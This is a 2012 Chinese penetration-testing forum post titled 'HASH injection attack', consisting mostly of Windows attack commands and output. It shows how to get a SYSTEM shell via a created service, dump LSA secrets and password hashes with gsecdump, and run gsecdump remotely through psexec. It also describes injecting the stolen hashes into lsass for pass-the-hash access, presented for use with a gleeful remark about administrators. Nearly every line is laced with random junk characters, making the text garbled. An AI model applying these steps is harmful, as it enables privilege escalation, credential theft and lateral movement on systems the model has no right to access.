找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 HASH注入式攻击
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1967|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:  ?1 @9 D+ X9 }- D

1 @/ c# z/ i" I2 Z% _* sC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact; x% {; I4 e: Q6 e* h5 z3 C2 j
[SC] CreateService SUCCESS1 s2 ]( [) z/ \9 c, @5 A
% W5 K! q+ x; |* X; G1 N3 J) D
C:\>sc start shellcmdline
1 {( F: N- F7 I) ^* u" G[SC] StartService FAILED 1053:
. N+ W0 L$ G4 Q& `/ L8 V. x$ U2 ?- U/ P  ]
The service did not respond to the start or control request in a timely fashion.! a- W; }; F  A5 _! A* [

6 Y3 Z. t3 X  |( S& QC:\>sc delete shellcmdline
" L) @* f4 H" e! K- \[SC] DeleteService SUCCESS( P) T* q2 T& \; n  U: \, A
. z9 Z# ~  g3 f" G( o
------------8 Q( j% d6 V/ n9 ^5 k4 a

. L* |" {' ?8 M, ~" N4 n. Y4 w! @; YThen in the new DOS window:9 U9 z8 x: |5 e. w5 |" _$ D" M
- }7 C2 K9 {" y% O7 E$ K! ?
Microsoft Windows XP [Version 5.1.2600]  E- G; b; L3 J: M  |/ K- r) T
(C) Copyright 1985-2001 Microsoft Corp.
) L$ m1 o! W+ @/ p1 L
) P0 `$ d) k+ m; v/ _C:\WINDOWS\system32>whoami
0 n( _& l2 n" k" s( JNT AUTHORITY\SYSTEM
% k4 X* Y/ Y: A
. D2 s5 d5 V3 P+ Z& OC:\WINDOWS\system32>gsecdump -h
( q. }* Q# f+ D7 u  Igsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)  l( Y4 d  k' h. k  Z5 R
usage: gsecdump [options]
* w1 P* X. Q& i/ y  D
6 a  a/ P& x6 t; zoptions:
7 ?; b" C4 A, }! I# p% c3 D-h [ --help ] show help' O( z! L6 K+ L  f) ^
-a [ --dump_all ] dump all secrets2 v# l5 d7 k# V! m- n/ g3 o: t
-l [ --dump_lsa ] dump lsa secrets
- ~! z" a9 N; M) u" A-w [ --dump_wireless ] dump microsoft wireless connections9 U- P! l3 j2 V% i: Q! G+ f+ \0 h( t
-u [ --dump_usedhashes ] dump hashes from active logon sessions
  ]- Z8 e8 y+ Y- C. w" Q-s [ --dump_hashes ] dump hashes from SAM/AD
/ ^4 m) ^9 i0 }' g6 w3 E$ G" }5 m+ Q7 A: G; Q
Although I like to use:0 P: f1 W, ~& Y2 [' z7 N9 c
' i3 a3 f8 g+ t2 {
PsExec v1.83 - Execute processes remotely
/ m# ?2 [( i/ X7 A% [Copyright (C) 2001-2007 Mark Russinovich
* W- l# l% t* [/ K' aSysinternals - 链接标记[url]www.sysinternals.com[/url]
/ o! ]! h- i" H. a' a% i# A! C+ w8 T. F* k" I
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
- Q; D3 }7 w$ F& G0 `1 B9 E5 R+ \5 @5 s7 @  P
to get the hashes from active logon sessions of a remote system.4 k" {+ f- K5 V" J  }! g
" b* ~9 ~! Z8 o# V* D+ ^
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
1 j( W- ?6 X. }# ~( P, N$ T$ S$ A/ I; c; y: F" r; {  q
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
$ l$ e7 o/ _' Q原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
# E. {  o/ J( Q- S# z
. `6 r' ~/ j( _$ ~+ o: M2 N' P! x我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。; j2 B+ s, R8 E6 D
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表